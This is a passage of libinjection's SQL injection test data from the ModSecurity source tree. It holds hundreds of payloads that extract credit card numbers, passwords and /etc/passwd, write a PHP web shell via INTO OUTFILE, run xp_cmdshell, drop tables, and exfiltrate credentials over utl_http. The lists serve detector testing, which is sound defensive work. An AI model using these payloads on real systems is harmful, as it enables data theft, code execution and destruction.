+0%27rlike%280%29and+1+rlike+%28%40a%29or+true+-+%27+0+ 2a%27-1%5E+%27+0%27+and+%28select+mid%28user%2C1+%2F1%2C1%2F+1%29from%60mysql%60.user+limit+1%29+rlike+%27r +A%27+sounds+like%28select+case%281%3D1%29when%271%27then%27A%27end%29+and+%271 1%27+and+0x31%3D%271+ 1%27+and+0x05%3D%28select+0-+-mid%28version%28%29%2F-+-1%2C+1%2C1%29+as+%27a%27+from+dual%29+and+%271+ %27AND+1.-1LIKE.1+EXEC+xp_cmdshell+%27dir+ # skipping #SELECT+1%2C2%2C0xEF%60 #SELECT+1%2C2%2C3%60abc%60%60 1%27AND%23%0A++++++++++++++++++++++++0%23%0A++++++++++++++++++++++++UNION%23%0A++++++++++++++++++++++++SELECT%40a%3A%3Dtable_name+FROM%23%0A++++++++++++++++++++++++information_schema.tables+LIMIT+1%23 1%27+and+0x43+%3D+%28select+all+mid%28table_name%2C+1%2C1%29as%27a%27from+%60information_schema%60.tables+limit+1%29+and+%271%0A++++++++++++++++++++++++%27AND+1.-1LIKE.1+INSERT+INTO+TMP_DB+EXEC+%22xp_cmdshell%22%27dir 1%27+AND+0x35+%3D+%28SELECT+%40phpids%3A%3DMID%28%40%40version+FROM+1+FOR+1%29+FROM+dual%29+and+%271+ null%27+or+%40%3A%3D%28select+all+user%27%27+from+mysql+.+user+limit+1%29+union%23%0A++++++++++++++++++++++++%23%0A++++++++++++++++++++++++select+%40%27 1%27and+%23%0A++++++++++++++++++++++++%23aa%0A++++++++++++++++++++++++0+union%23%0A++++++++++++++++++++++++%23bb%0A++++++++++++++++++++++++select+version%28%29%60 1%27and+%23%0A++++++++++++++++++++++++%23aa%0A++++++++++++++++++++++++0+union%23%0A++++++++++++++++++++++++%23bb%0A++++++++++++++++++++++++select+%28select+%60user%60+from%23%0A++++++++++++++++++++++++%23cc%0A++++++++++++++++++++++++mysql.user+limit+1%29%27 modsecurity-v3.0.4/others/libinjection/data/sqli-mysql-implicit.txt0000644000175000017500000000222413607066311026062 0ustar zimmerlezimmerle# mysql implicit conversions tests A' AND 'B A 'AND' B 'AND' ' AND ' A' && 'B A '&&' B '&&' ' && ' A' = 'B A '=' B '=' ' = ' A' & 'B A '&' B '&' ' & ' A' | 'B A '|' B '|' ' | ' A' ^ 'B A '^' B '^' ' ^ ' A' DIV 'B A 'DIV' B 'DIV' ' DIV ' A' / 'B A '/' B '/' ' / ' A' <=> 'B A '<=>' B '<=>' ' <=> ' A' >= 'B A '>=' B '>=' ' >= ' A' > 'B A '>' B '>' ' > ' A' << 'B A '<<' B '<<' ' << ' A' <= 'B A '<=' B '<=' ' <= ' A' < 'B A '<' B '<' ' < ' A' LIKE 'B # common false positive #A 'LIKE' B #'LIKE' #' LIKE ' A' - 'B A '-' B '-' ' - ' A' %25 'B A '%25' B '%25' ' %25 ' A' MOD 'B A 'MOD' B 'MOD' ' MOD ' A' != 'B A '!=' B '!=' ' != ' A' <> 'B A '<>' B '<>' ' <> ' A' NOT LIKE 'B A 'NOT LIKE' B 'NOT LIKE' ' NOT LIKE ' A' NOT REGEXP 'B A 'NOT REGEXP' B 'NOT REGEXP' ' NOT REGEXP ' A' OR 'B A 'OR' B 'OR' ' OR ' A' || 'B A '||' B '||' ' || ' A' %2B 'B A '%2B' B '%2B' ' %2B ' A' REGEXP 'B A 'REGEXP' B 'REGEXP' ' REGEXP ' A' >> 'B A '>>' B '>>' ' >> ' A' RLIKE 'B A 'RLIKE' B 'RLIKE' ' RLIKE ' A' NOT RLIKE 'B A 'NOT RLIKE' B 'NOT RLIKE' ' NOT RLIKE ' A' SOUNDS LIKE 'B A 'SOUNDS LIKE' B 'SOUNDS LIKE' ' SOUNDS LIKE ' A' * 'B A '*' B '*' ' * ' A' XOR 'B A 'XOR' B 'XOR' ' XOR ' modsecurity-v3.0.4/others/libinjection/data/sqli-misc.txt0000644000175000017500000007152513607066311024052 0ustar zimmerlezimmerle# # Misc collected attacks from the wild and beyond.... # SO_BUY+AND+IF%281%3D1%2CBENCHMARK%281589466%2CMD5%280X41%29%29%2C0%29 SO_BUY%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27-- SO_BUY+AND%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%28%28SELECT+%28SELECT+CONCAT%280X7E%2C0X27%2CDATABASE%28%29%2C0X27%2C0X7E%29%29+FROM+%60INFORMATION_SCHEMA%60.TABLES+LIMIT+0%2C1%29%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+%60INFORMATION_SCHEMA%60.TABLES+GROUP+BY+X%29A%29+AND+1%3D1 SO_BUY+AND%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%28%28SELECT+%28SELECT+CONCAT%280X7E%2C0X27%2CUNHEX%28HEX%28CAST%28DATABASE%28%29+AS+CHAR%29%29%29%2C0X27%2C0X7E%29%29+FROM+%60INFORMATION_SCHEMA%60.TABLES+LIMIT+0%2C1%29%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+%60INFORMATION_SCHEMA%60.TABLES+GROUP+BY+X%29A%29+AND+1%3D1 PHPX+AND+1%3D1+AND+XX%3DX PHPX+AND+CHAR%28124%29+USER+CHAR%28124%29%3D0+AND+XX%3DX SO_BUY%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27--%27 SO_BUY%27%3B+IF+%281%3D1%29+WAITFOR+DELAY+%2700%3A00%3A01%27-- materials'%20and%201=1%20and%20''=' materials'%20and%201=2%20and%20''=' 1'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20'%25'=' -999.9'%20UNION%20ALL%20SELECT%200x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536%20and%20'x'='x # not sql #5000224%27%20UNION%20user_id%3E0-- -5000224%27%20UNION%20select%20user_id%20from%20users%20where%20user_id%3E0// # not sql #-5000224%27%20UNION%20user_id%3E0-- 5000224%27%20or%201=1-- 8+and+1=1-- 8+order+by+1-- 8-999.9+union+select+0 9-999.9+union+select+0-- 6334588%00%27%7C%7CSLEEP%283%29%26%26%271 6334588%20AND%20BENCHMARK%282999999%2CMD5%28NOW%28%29%29%29 6334588%26%26SLEEP%283%29 6334588%27%20AND%20BENCHMARK%282999999%2CMD5%28NOW%28%29%29%29%20AND%20%271 6334588%27%20AND%20SLEEP%283%29%20AND%20%271 6402272%27%20%61%6E%64%20%27%36%27%3D%27%356402272%27%20%61%6E%64%20%27%36%27%3D%27%366444930%20%61%6E%64%20%36%3D%35 6444930%20%61%6E%64%20%36%3D%36 6444930%27%20%61%6E%64%20%27%36%27%3D%27%35 6444930%27%20%61%6E%64%20%27%36%27%3D%27%36 FOO%29%29+AND+UPDATEXML%281025%2CCONCAT%280X2E%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%281025%3D1025%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%2C7573%29+AND+%28%283045%3D3045 1+%2B+%28SELECT+6744+FROM+DUAL+WHERE+3176%3D3176+AND+3761%3D5879%23+%29 1234.5%29+ORDER+BY+1 FOO%2C%28SELECT+%28CASE+WHEN+%284831%3D4831%29+THEN+1+ELSE+1%2F%28SELECT+0%29+END%29%29 FOO%29%3B+IF%28%286681%3D9099%29%2CSELECT+6681%2CDROP+FUNCTION+CGIQ%29%3B%23+AND+%284596%3D4596 FOO%2C%28SELECT+%28CASE+WHEN+%284763%3D4974%29+THEN+FOO+ELSE+4763%2A%28SELECT+4763+FROM+MYSQL.DB%29+END%29%29 FOO%29+WHERE+9060%3D9060+AND+UPDATEXML%281025%2CCONCAT%280X2E%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%281025%3D1025%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%2C7573%29 FOO%29%29%29+AND+3787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT+%28CASE+WHEN+%283787%3D3787%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29 FOO+%2B+%28SELECT+9350+WHERE+8850%3D8850+AND+3963%3D4777--++%29 FOO%29+AND+4499%3D8923%23 FOO%2CIIF%282510%3D9436%2CFOO%2C1%2F0%29 FOO%29%29%3B+IF%28%288708%3D3788%29%2CSELECT+8708%2CDROP+FUNCTION+RIHR%29%3B%23+AND+%28%286571%3D6571 FOO%29%29%29%3B+IF%28%289256%3D5702%29%2CSELECT+9256%2CDROP+FUNCTION+IRII%29%3B%23+AND+%28%28%283502%3D350 %28SELECT+2299%3D%28%27%3AJQA%3A%27%7C%7C%28SELECT+CASE+2299+WHEN+2299+THEN+1+ELSE+0+END+FROM+RDB%24DATABASE%29%7C%7C%27%3AUGJ%3A%27%29%29 %28SELECT+2811+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280X3A6A71613A%2C%28SELECT+%28CASE+WHEN+%282811%3D2811%29+THEN+1+ELSE+0+END%29%29%2C0X3A75676A3A%2CFLOOR%28RAND%280%29%2A2%29%29X+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+X%29A%29 FOO%2CEXTRACTVALUE%288571%2CCONCAT%280X5C%2C0X3A7676693A%2C%28SELECT+%28CASE+WHEN+%288571%3D8571%29+THEN+1+ELSE+0+END%29%29%2C0X3A7471773A%29%29 %28CASE+WHEN+4518%3D5617+THEN+1+ELSE+NULL+END%29 FOO%29%29%3B+SELECT+PG_SLEEP%285%29%3B-- FOO%29%29%29%3B+BEGIN+DBMS_LOCK.SLEEP%285%29%3B+END%3B--+AND+%28%28%288410%3D8410 FOO%29%29+WAITFOR+DELAY+%270%3A0%3A5%27--+AND+%28%282114%3D2114 FOO%29%29%29+WAITFOR+DELAY+%270%3A0%3A5%27--+AND+%28%28%281285%3D1285 FOO+WAITFOR+DELAY+%270%3A0%3A5%27-- 1+order+by+1 FOO%2C%28CAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT+%28CASE+WHEN+%281861%3D1861%29+THEN+1+ELSE+0+END%29%29%3A%3ATEXT%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29+AS+NUMERIC%29%29 %28SELECT+GENERATE_SERIES%28FOO%2CFOO%2CCASE+WHEN+%289255%3D9830%29+THEN+1+ELSE+0+END%29+LIMIT+1%29 -999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- 999999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27%2CNULL-- -999.9+UNION+ALL+SELECT+%27R3DM0V3_HVJ_INJECTION%27-- -999.9+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- 999.9+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- 999999.9+UNION+ALL+SELECT+CHR%28114%29%7C%7CCHR%2851%29%7C%7CCHR%28100%29%7C%7CCHR%28109%29%7C%7CCHR%2848%29%7C%7CCHR%28118%29%7C%7CCHR%2851%29%7C%7CCHR%2895%29%7C%7CCHR%28104%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%2895%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28106%29%7C%7CCHR%28101%29%7C%7CCHR%2899%29%7C%7CCHR%28116%29%7C%7CCHR%28105%29%7C%7CCHR%28111%29%7C%7CCHR%28110%29-- CAT1_GALLERY_1+UNION+ALL+SELECT+%28SELECT+CAST%28CHAR%28114%29%2BCHAR%2851%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%2848%29%2BCHAR%28118%29%2BCHAR%2851%29%2BCHAR%2895%29%2BCHAR%28104%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%2895%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28116%29%2BCHAR%28105%29%2BCHAR%28111%29%2BCHAR%28110%29+AS+NVARCHAR%284000%29%29%29%2CNULL-- 1 - ORD('A') TRUE DIV(SELECT ORD(LEFT TRUE DIV(SELECT (ORD(LEFT TRUE DIV(SELECT ((ORD(LEFT 1 DIV(SELECT ORD(LEFT 1 DIV(SELECT (ORD(LEFT 0 UNION SELECT (1),2,3 1 AND (SELECT TOP 10 USERNAME FROM USERS); 1 AND SELECT 1 FROM T.TRANS_DATE -- 1 1 AND (SELECT 1 FROM T.TRANS_DATE -- 1 1 GROUP BY 1 HAVING 1 = 1 1 GROUP BY 1 HAVING '1' = 1 1 GROUP BY 1,TRANSID,ACCOUNTID HAVING 1=1 1 AND SELECT TOP 10 USERNAME FROM USERS -- 1 1001 union(select userid, ccnumber, '3', '4' from credit_cards) 1001 union((select userid, ccnumber, '3', '4' from credit_cards)) 1001 union/*/**/*/select userid, ccnumber, '3', '4' from credit_cards 1001 or 'A' = 'B' union select userid, ccnumber, '3', '4' from credit_cards '6334588?'||SLEEP(3)&&'1 1001*/*!50000(1)union*/all(select 1,ccnumber,3,4 from credit_cards) 1001*/*!50000(1)union select 1,ccnumber,load_file('/etc/passwd'),4 from credit_cards*/ (1001)union select-1,ccnumber,3,4 from credit_cards (1001)union select (1),ccnumber,3,4 from credit_cards (1001)union select @a,ccnumber,3,4 from credit_cards 1001-\N%0aunion select 1,ccnumber,3,4 from credit_cards 1001 sounds like '1001' union select 1,ccnumber,3,4 from credit_cards 1001-'text' union select 1,ccnumber,3,4 from credit_cards 1001%2b@a union select 1,load_file('/etc/passwd'),3,4 from credit_cards ((1001)-1) union select 1,2,3,4 from credit_cards 1001'-@a union select 1,2,3,4 from credit_cards-- - '1001'-@a union select 1,2,3,4 from credit_cards ((1001)-1) union select 1,2,3,4 from credit_cards 1001 rlike(-1)union select 1,2,3,4 from credit_cards ## 1001 ----1 union select 1,2,3,4 from credit_cards 1001 or 'foo' union select 1,2,3,4 from credit_cards 1001 and @a union select 1,2,3,4 from credit_cards 1001 like @a-1 union select 1,2,3,4 from credit_cards 1001-\N-\N union select 1,2,3,4 from credit_cards (1001-\N-\N) union select 1,2,3,4 from credit_cards (1001-\N)-\N union select 1,2,3,4 from credit_cards 1001-\N union select 1,2,3,4 from credit_cards 1001-true union select 1,2,3,4 from credit_cards (1001-true) union select 1,2,3,4 from credit_cards (1001-'1') union select 1,2,3,4 from credit_cards (1001-@version) union select 1,2,3,4 from credit_cards 1-(1001-true) union select 1,2,3,4 from credit_cards 1001-false-false union select 1,2,3,4 from credit_cards 1001-false-NULL union select 1,2,3,4 from credit_cards 1001 rlike(1-NULL)union select 1,2,3,4 from credit_cards 1001 rlike(1-(NULL))union select 1,2,3,4 from credit_cards (1)-'1' union select 1,2,3,4 from credit_cards (1)-@version union select 1,2,3,4 from credit_cards (@version)-@version union select 1,2,3,4 from credit_cards (@version)-1 union select 1,2,3,4 from credit_cards (@version)-'1' union select 1,2,3,4 from credit_cards @version-@version union select 1,2,3,4 from credit_cards @version-1 union select 1,2,3,4 from credit_cards @version-'1' union select 1,2,3,4 from credit_cards ('1')-'1' union select 1,2,3,4 from credit_cards 1001 rlike(-1-1)union select 1,2,3,4 from credit_cards 1001 rlike(1-1)union select 1,2,3,4 from credit_cards 1001 rlike(@version)union select 1,2,3,4 from credit_cards 1001 rlike(@version-1)union select 1,2,3,4 from credit_cards 1001 rlike(1-@version)union select 1,2,3,4 from credit_cards 1001 rlike('1')union select 1,2,3,4 from credit_cards # vv new variations 2013-04-10 nickg vv 1001 RLIKE ((1)) UNION SELECT 1 FROM CREDIT_CARDS 1001 RLIKE ((-1)) UNION SELECT 1 FROM CREDIT_CARDS 1001 RLIKE ((-"1")) UNION SELECT 1 FROM CREDIT_CARDS 1001 RLIKE (-(1)) UNION SELECT 1 FROM CREDIT_CARDS 1001 RLIKE (-(-1)) UNION SELECT 1 FROM CREDIT_CARDS # http://vagosec.org/2013/04/mysql-implicit-type-conversion/ # a'+'b encoded is a%27%2B%27b a%27%2B%27b ' OR 1='1 # new variations X' != 'Y' = 0 = '1 X' = 'X' = 0 = '1 X' = 'X' = 'X' = 0 = '1 X' - 'Y' - 0 = '1 # part of parameter pollution 1) FROM USERS WHERE USERNAME= # nest pgsql mssql comments 1/* /*/ */ */ or 1=1- 1/* /* / */ */ or 1=1- # small sqli 1-- 1 -- 1 -- 1/* 1 /* 1 /* 1*1-- 1 * 1-- 1 * 1 -- 1*1/* 1 * 1/* 1 * 1 /* 1 * 1 /* @version-- @@version-- @version -- @version /* @version/* # thanks @d0znpp (select id from users limit 1,1) (select id-0 from users limit 1,1) # known bypass.. for now! (select id,id,id,id from users limit 1,1) # some variations '1' union (select id from users limit 1,1) 1 union (select id from users limit 1,1) xxx union (select id from users limit 1,1) @version union (select id from users limit 1,1) '1' union (select 1 from users limit 1,1) 1 union (select 1 from users limit 1,1) xxx union (select 1 from users limit 1,1) @version union (select 1 from users limit 1,1) '1' union (select xxx from users limit 1,1) 1 union (select xxx from users limit 1,1) xxx union (select xxx from users limit 1,1) @version union (select xxx from users limit 1,1) '1' union (select 's' from users limit 1,1) 1 union (select 's' from users limit 1,1) xxx union (select 's' from users limit 1,1) @version union (select 's' from users limit 1,1) # thanks @LightOS -1 union(((select table_name from information_schema.tables limit 1,1))) '1' union(((select table_name from information_schema.tables limit 1,1))) @foo union(((select table_name from information_schema.tables limit 1,1))) id union(((select table_name from information_schema.tables limit 1,1))) # and again @LightOS test'-1/1/**/union(select table) test'-1 union(select table) test'-@version union (select table) test'-'xyz' union (select table) 1- @version union(select table_name from information_schema.tables limit 1,1) 1- 'xxx' union(select table_name from information_schema.tables limit 1,1) 1- union(select table_name from information_schema.tables limit 1,1) @version - @version union(select table_name from information_schema.tables limit 1,1) @version- 'xxx' union(select table_name from information_schema.tables limit 1,1) @version - 5 union(select table_name from information_schema.tables limit 1,1) # 1 into outfile 'asd' 1 into outfile 'asd'-- '1' into outfile 'asd' '1' into outfile 'asd' -- @version into outfile 'asd' @version into outfile 'asd' -- 1 into outfile ('asd') '1' into outfile ('asd') @version into outfile ('asd') 1 into outfile substring('asd', 10, 1) '1' into outfile substring('asd', 10, 1) @version into outfile substring('asd', 10 1) 1 into outfile (substring('asd', 10, 1)) '1' into outfile (substring('asd', 10, 1)) @version into outfile (substring('asd', 10 1)) %28select+substr%0D%0A%28login%0D%0A%0D%0A%29%0D%0Afrom+users+limit+1%2C1%29 union%20%28select+id+from+users+limit+1%2C1%29 # # This is not valid SQL but designed to force a syntax error # http://www.modsecurity.org/testphp.vulnweb.com/listproducts.php?cat=1%0Aand+current_user=notthere() 1%0Aand+current_user=notthere() 1%0Aand+current_user=1 1%0Aand+current_user=@version 1%0Aand+current_user='junk' 1%0Aand+current_user=foo 1--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29 1'--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29 @version--%0a+union%0C-%28%20select+table_name+from+information_schema.tables+limit+1%2C1%29 -.1a%20union%20%28select+id+from+users+limit+1%2C1%29 case 1 when 2 then 2 end case sin(1) when 2 then 2 end case '1' when 2 then 2 end case 1 when 's' then 2 end case when 2 then 3 end case when 's' then 3 end case when f(1) then 3 end -1 union select table_name asda from information_schema.tables -1 union select table_name "asda" from information_schema.tables -1 union select table_name `asda` from information_schema.tables -1 union select table_name as asda from information_schema.tables -1 union select table_name as "asda" from information_schema.tables -1 union select table_name as `asda` from information_schema.tables a'and(select(binary(/*!system_user()*/)))like'reading%25 -1 union select @``"", table_name from information_schema.tables 'foo' union select @``"", table_name from information_schema.tables @version union select @``"", table_name from information_schema.tables select @version foo select @version "foo" select @version foo -- junk select @version "foo" -- junk $$pgsql evade$$ union select * from foo $foo$pgsql evade$foo$ union select * from foo u&'pgsql evade' union select * from foo U&'pgsql evade' union select * from foo U&'pgsql evade' uescape '!' union select * from foo _latin1'foo' union select * from foo _LATIN7'foo' union select * from foo _utf8'foo' union select * from foo REAL 1 union select * from foo 1::REAL union select * from foo 1::REAL::REAL union select * from foo -1 union select @``"", table_name from information_schema.tables !~1 union select table_name from information_schema.tables -1 union select @a`from 1`, table_name from information_schema.tables version() union select table_name from information_schema.tables -1 LOCK IN SHARE MODE UNION SELECT table_name from information_schema.tables 1 is unknown union select table_name from information_schema.tables true is not unknown for update union select table_name from information_schema.tables 1 for update union select 1 # ht/ TK (true)-(true)union select table_name from information_schema.tables (@a)-(@a)union select table_name from information_schema.tables # ht/ @stamparm 1 OR (1 OR 1)-- (1) OR (1 OR 1)-- ((1) OR (1 OR 1))-- ((1) OR ((1 OR 1)))-- 1 OR ((1 OR 1)) -- 1 OR ((1) OR 1) -- # ht/ @stamparm (@x OR @y) UNION ALL SELECT name,email,password FROM users-- (@x OR (@y)) UNION ALL SELECT name,email,password FROM users-- ((@x) OR @y) UNION ALL SELECT name,email,password FROM users-- (@x) OR (@y) UNION ALL SELECT name,email,password FROM users-- @x) OR (@y) UNION ALL SELECT name,email,password FROM users-- @x OR (@y) UNION ALL SELECT name,email,password FROM users-- # ht/ @stamparm (SELECT 1 FROM DUAL) (SELECT @a FROM DUAL) UNION ALL SELECT 1, 2, 3-- (SELECT (1) FROM DUAL) (select @version from dual) (select (@version - 1) from dual) (select ('foo' - 1) from dual) (select 'foo' from dual) (select 1 foobar from dual) # previously had problems with operators made from two words # ht/@stamparm 1 and 1 not between 0 and 1 1 AND 1 SOUNDS LIKE 1 1 AND 1 NOT LIKE 0 (1 AND 1) OR 2>1-- # ht/@FluxReiners '-(1 or 1) and 1=0 union select load_file('/etc/passwd'),credit_card,password from users-- - '-(-1 or -1) and 1=0 union '-(-(1) or -1) and 1=0 union '-((1) or -1) and 1=0 union # https://twitter.com/dsrbr/status/342132003270959104 -1 union select null, listagg(login || ':' || pass,', ') within group (order by login) from users; -1 union select null, xmlagg(xmlelement("user",login || ':' || pass).getStringVal() from users; -1 union select null, stragg(login || ':' || pass ||', ') from users; -1 union select listagg(login || ':' || pass,', ') within group (order by login) from users; #ht ivan users.id%0D%0A%23asd%0D%0Aunion%0D%0A%23asd%0D%0Aselect%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Aaa+%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Afrom%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Aasdasd # http://samincube.blogspot.ru/2013/06/time-based-sqli-on-google-coupon.html 1'=sleep(1)='1 # https://twitter.com/dsrbr/status/343017094926962691 1 and select (utl_http.request('http://client9.com/') || select listagg(login || chr(58) || pass || ', ') within group (order by login) from dual) is not null; # https://twitter.com/dsrbr/status/341228356936814592 -1 union select top 1 null, lead(pass, 0) over (order by pass) from users; # https://twitter.com/dsrbr/status/340018970054766592 -1 union select null, array_to_json(array_agg(users))::text from users limit 1; 1 and (select array_to_json(array_agg(users))::text::bool from users limit 1; # http://www.exploit-db.com/exploits/25915/ ' UNION SELECT 0x3c3f7068702073797374656d28245f4745545b227272225d293b3f3e,null,null,null,null,null,null,null,null,null,null,null,null,null INTO OUTFILE 'afile.php' # http://blog.detectify.com/post/51651525114/the-ultimate-sql-injection-payload IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ # misc secondary sql statements 1 and true; BEGIN DECLARE @xy varchar(8000) 1; BEGIN DECLARE @xy varchar(8000) x' and 1 = 0; BEGIN DECLARE x' AND 1=0; DROP TABLE TMP_DB; ' AND 1=0; DECLARE @S VARCHAR(4000) SET @S ' IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE # https://twitter.com/st1ll_di3/status/344416764949561346 # http://pastebin.com/Ymcs7nE0 (--- 0)'=(currenT_user()-3) union select 1,2,3 from users; -- - # example from http://www.websec.ca/kb/sql_injection 1=1 AND-+-+-+-+~~((1)) # the bizarre sp_password hackery 1-- foo sp_password 1'--sp_password # nice ms-access, courtesy mod-security foo' Eqv StrComp(username, 0x12+0x34+0xab+0xcd,0) Imp 'a # mysql and pgsql string litterals b'1' UNION SELECT 1 x'1' UNION SELECT 1 n'1' UNION SELECT 1 # ending clauses 1 having 1 limit 1 union select 1-- 1 having (1) limit 1 union select 1-- 1 having -(1) limit 1 union select 1-- 1 having sin(1) limit 1 union select 1-- 1 having 1 limit 2 group by 3 union select 1-- 1 group by 2 union select 1 -- sin(1) group by 1 union select 1-- @version group by 1 union select 1-- @version group by (-1) union select 1-- (@version) group by -1 union select 1-- (@version) group by (-1) union select 1-- (@version)) group by (-1) union select 1-- (1)) group by (-1) union select 1-- (@version) group by sin(-1) union select 1-- 1 group by sin(1) union select 1-- 1 group by 1 - sin(1) union select 1-- 1 group by (sin(1)) union select 1-- -1 group by -(-sin(1)) union select 1-- sin(1) group by (-sin(1)) union select 1-- sin(1)-1 group by (-sin(1)) union select 1-- sin(1)-1 group by 1 union select 1-- 1 group by ((1)) union select 1-- 1 group by (((1))) union select 1-- ((1)) group by (1) union select 1-- (1) group by ((1)) union select 1-- (1) group by (1) union select 1-- # more with 'having' -(1) is not unknown having 1 order by 1 limit 1 for update UNION select table_name from information_schema.tables limit 1 -(1) is not unknown UNION select table_name from information_schema.tables limit 1 -(1) is not unknown for update UNION select table_name from information_schema.tables limit 1 -(1) is not unknown having 1 order by 1 limit 1 UNION select table_name from information_schema.tables limit 1 -(1) is not unknown having 1 UNION select table_name from information_schema.tables limit 1 -(1) is not unknown UNION select table_name from information_schema.tables limit 1 -(1) is not unknown having 1 UNION select table_name from information_schema.tables limit 1 -(1) is unknown having 1 UNION select table_name from information_schema.tables limit 1 -(1) for update UNION select table_name from information_schema.tables limit 1 1 for update UNION select table_name from information_schema.tables limit 1 -(1) for update UNION select table_name from information_schema.tables limit 1 -(true) for update UNION select table_name from information_schema.tables limit 1 -(null) for update UNION select table_name from information_schema.tables limit 1 -(\N) for update UNION select table_name from information_schema.tables limit 1 -(\N) for update having true UNION select table_name from information_schema.tables limit 1 -(\N) for update having 1 UNION select table_name from information_schema.tables limit 1 -(1) for update having 1 UNION select table_name from information_schema.tables limit 1 -(1) having 1 for updateUNION select table_name from information_schema.tables limit 1 -(1) having 1 for update UNION select table_name from information_schema.tables limit 1 -(1) having 1 for update UNION select table_name from information_schema.tables limit 1 \''; DROP TABLE users; -- \''); DROP TABLE users; -- \''; /* one */ ;DROP TABLE users; -- \''; select 1; drop table users; -- 1; USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck 1; EXECUTE AS LOGIN 'root'; GO xp_cmdshell 'whoami.exe' ; REVERT ; 1; USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck 1); USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck EXEC sp_add_job @job_name = 'TestJob'; EXECUTE sp_add_job @job_name = 'TestJob'; 1;EXECUTE sp_add_job @job_name = 'TestJob'; 1;print 'foo'; exec xp_cmdshell 'destroy'; # nested sub-selects -1 - (select (1 - select (select 1))) 